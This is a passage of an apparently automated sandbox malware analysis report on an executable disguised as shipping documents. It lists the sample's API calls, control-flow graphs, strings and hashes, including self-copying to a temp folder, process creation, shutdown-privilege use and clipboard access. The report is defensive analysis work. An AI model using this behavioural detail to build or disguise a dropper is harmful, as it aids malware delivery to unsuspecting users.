                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                        • OleInitialize.OLE32(00000000), ref: 00403670
                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000020,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                        • wsprintfW.USER32 ref: 004039B1
                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                        • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                          • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                        • ExitProcess.KERNEL32 ref: 00403A9F
                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                        • ExitProcess.KERNEL32 ref: 00403B49
                                          • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$C:\Users\user\AppData\Local\acneform\Baroco$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                        • API String ID: 1813718867-519494932
                                        • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                        • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                        Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 281 40571b-405736 282 4058c5-4058cc 281->282 283 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 281->283 285 4058f6-405903 282->285 286 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 282->286 305 405821-405824 283->305 306 405805-40581f SendMessageW * 2 283->306 288 405921-40592b 285->288 289 405905-40590b 285->289 286->285 290 405981-405985 288->290 291 40592d-405933 288->291 293 405946-40594f call 40453d 289->293 294 40590d-40591c ShowWindow * 2 call 40450b 289->294 290->293 300 405987-40598d 290->300 296 405935-405941 call 4044af 291->296 297 40595b-40596b ShowWindow 291->297 302 405954-405958 293->302 294->288 296->293 303 40597b-40597c call 4044af 297->303 304 40596d-405976 call 4055dc 297->304 300->293 307 40598f-4059a2 SendMessageW 300->307 303->290 304->303 308 405834-40584b call 4044d6 305->308 309 405826-405832 SendMessageW 305->309 306->305 310 405aa4-405aa6 307->310 311 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 307->311 320 405881-4058a2 GetDlgItem SendMessageW 308->320 321 40584d-405861 ShowWindow 308->321 309->308 310->302 318 4059d5-4059e5 GetWindowRect 311->318 319 4059e8-4059fd TrackPopupMenu 311->319 318->319 319->310 322 405a03-405a1a 319->322 320->310 325 4058a8-4058c0 SendMessageW * 2 320->325 323 405870 321->323 324 405863-40586e ShowWindow 321->324 326 405a1f-405a3a SendMessageW 322->326 327 405876-40587c call 40450b 323->327 324->327 325->310 326->326 328 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 326->328 327->320 330 405a61-405a88 SendMessageW 328->330 330->330 331 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 330->331 331->310
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405779
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                        • GetClientRect.USER32(?,?), ref: 004057C5
                                        • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                        • ShowWindow.USER32(?,00000008), ref: 00405868
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                        • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                        • ShowWindow.USER32(00000000), ref: 00405914
                                        • ShowWindow.USER32(?,00000008), ref: 00405919
                                        • ShowWindow.USER32(00000008), ref: 00405963
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                        • CreatePopupMenu.USER32 ref: 004059A8
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                        • GetWindowRect.USER32(?,?), ref: 004059DC
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                        • OpenClipboard.USER32(00000000), ref: 00405A3D
                                        • EmptyClipboard.USER32 ref: 00405A43
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                        • CloseClipboard.USER32 ref: 00405A9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                        • Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                        Function 00405C63 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 580 405c63-405c89 call 405f2e 583 405ca2-405ca9 580->583 584 405c8b-405c9d DeleteFileW 580->584 586 405cab-405cad 583->586 587 405cbc-405ccc call 406557 583->587 585 405e1f-405e23 584->585 588 405cb3-405cb6 586->588 589 405dcd-405dd2 586->589 593 405cdb-405cdc call 405e72 587->593 594 405cce-405cd9 lstrcatW 587->594 588->587 588->589 589->585 592 405dd4-405dd7 589->592 595 405de1-405de9 call 4068b4 592->595 596 405dd9-405ddf 592->596 597 405ce1-405ce5 593->597 594->597 595->585 603 405deb-405dff call 405e26 call 405c1b 595->603 596->585 600 405cf1-405cf7 lstrcatW 597->600 601 405ce7-405cef 597->601 604 405cfc-405d18 lstrlenW FindFirstFileW 600->604 601->600 601->604 620 405e01-405e04 603->620 621 405e17-405e1a call 4055dc 603->621 606 405dc2-405dc6 604->606 607 405d1e-405d26 604->607 606->589 611 405dc8 606->611 608 405d46-405d5a call 406557 607->608 609 405d28-405d30 607->609 622 405d71-405d7c call 405c1b 608->622 623 405d5c-405d64 608->623 612 405d32-405d3a 609->612 613 405da5-405db5 FindNextFileW 609->613 611->589 612->608 616 405d3c-405d44 612->616 613->607 619 405dbb-405dbc FindClose 613->619 616->608 616->613 619->606 620->596 624 405e06-405e15 call 4055dc call 406317 620->624 621->585 633 405d9d-405da0 call 4055dc 622->633 634 405d7e-405d81 622->634 623->613 625 405d66-405d6f call 405c63 623->625 624->585 625->613 633->613 637 405d83-405d93 call 4055dc call 406317 634->637 638 405d95-405d9b 634->638 637->613 638->613
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405C8C
                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CD4
                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CF7
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405CFD
                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"), ref: 00405D0D
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                        • FindClose.KERNEL32(00000000), ref: 00405DBC
                                        Strings
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00405C6C
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
                                        • pB, xrefs: 00405CBC
                                        • \*.*, xrefs: 00405CCE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                        • API String ID: 2035342205-4118179798
                                        • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                        • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                        Function 004068B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                        • FindClose.KERNEL32(00000000), ref: 004068CB
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsi1309.tmp, xrefs: 004068B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 2295610775-3576001853
                                        • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                        • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                        Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                        • Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                        Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 332 403fd7-403fe9 333 404150-40415f 332->333 334 403fef-403ff5 332->334 336 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 333->336 337 4041ae-4041c3 333->337 334->333 335 403ffb-404004 334->335 340 404006-404013 SetWindowPos 335->340 341 404019-404020 335->341 336->337 338 404203-404208 call 404522 337->338 339 4041c5-4041c8 337->339 351 40420d-404228 338->351 343 4041ca-4041d5 call 401389 339->343 344 4041fb-4041fd 339->344 340->341 346 404022-40403c ShowWindow 341->346 347 404064-40406a 341->347 343->344 368 4041d7-4041f6 SendMessageW 343->368 344->338 350 4044a3 344->350 352 404042-404055 GetWindowLongW 346->352 353 40413d-40414b call 40453d 346->353 354 404083-404086 347->354 355 40406c-40407e DestroyWindow 347->355 357 4044a5-4044ac 350->357 364 404231-404237 351->364 365 40422a-40422c call 40140b 351->365 352->353 366 40405b-40405e ShowWindow 352->366 353->357 360 404088-404094 SetWindowLongW 354->360 361 404099-40409f 354->361 358 404480-404486 355->358 358->350 371 404488-40448e 358->371 360->357 361->353 367 4040a5-4040b4 GetDlgItem 361->367 372 404461-40447a DestroyWindow EndDialog 364->372 373 40423d-404248 364->373 365->364 366->347 374 4040d3-4040d6 367->374 375 4040b6-4040cd SendMessageW IsWindowEnabled 367->375 368->357 371->350 376 404490-404499 ShowWindow 371->376 372->358 373->372 377 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 373->377 379 4040d8-4040d9 374->379 380 4040db-4040de 374->380 375->350 375->374 376->350 404 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 377->404 405 40429d-4042a2 377->405 382 404109-40410e call 4044af 379->382 383 4040e0-4040e6 380->383 384 4040ec-4040f1 380->384 382->353 387 404127-404137 SendMessageW 383->387 388 4040e8-4040ea 383->388 384->387 389 4040f3-4040f9 384->389 387->353 388->382 392 404110-404119 call 40140b 389->392 393 4040fb-404101 call 40140b 389->393 392->353 401 40411b-404125 392->401 402 404107 393->402 401->402 402->382 408 4042e3-4042e4 404->408 409 4042e6 404->409 405->404 410 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 408->410 409->410 411 404318-404329 SendMessageW 410->411 412 40432b 410->412 413 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 411->413 412->413 413->351 424 404376-404378 413->424 424->351 425 40437e-404382 424->425 426 4043a1-4043b5 DestroyWindow 425->426 427 404384-40438a 425->427 426->358 428 4043bb-4043e8 CreateDialogParamW 426->428 427->350 429 404390-404396 427->429 428->358 431 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 428->431 429->351 430 40439c 429->430 430->350 431->350 436 404447-40445a ShowWindow call 404522 431->436 438 40445f 436->438 438->358
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                        • ShowWindow.USER32(?), ref: 00404033
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                        • ShowWindow.USER32(?,00000004), ref: 0040405E
                                        • DestroyWindow.USER32 ref: 00404072
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                        • GetDlgItem.USER32(?,?), ref: 004040AA
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                        • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                        • GetDlgItem.USER32(?,00000001), ref: 00404170
                                        • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                        • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                        • ShowWindow.USER32(00000000,?), ref: 004042AC
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                        • EnableWindow.USER32(?,?), ref: 004042D9
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                        • EnableMenuItem.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                        • ShowWindow.USER32(?,0000000A), ref: 00404493
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
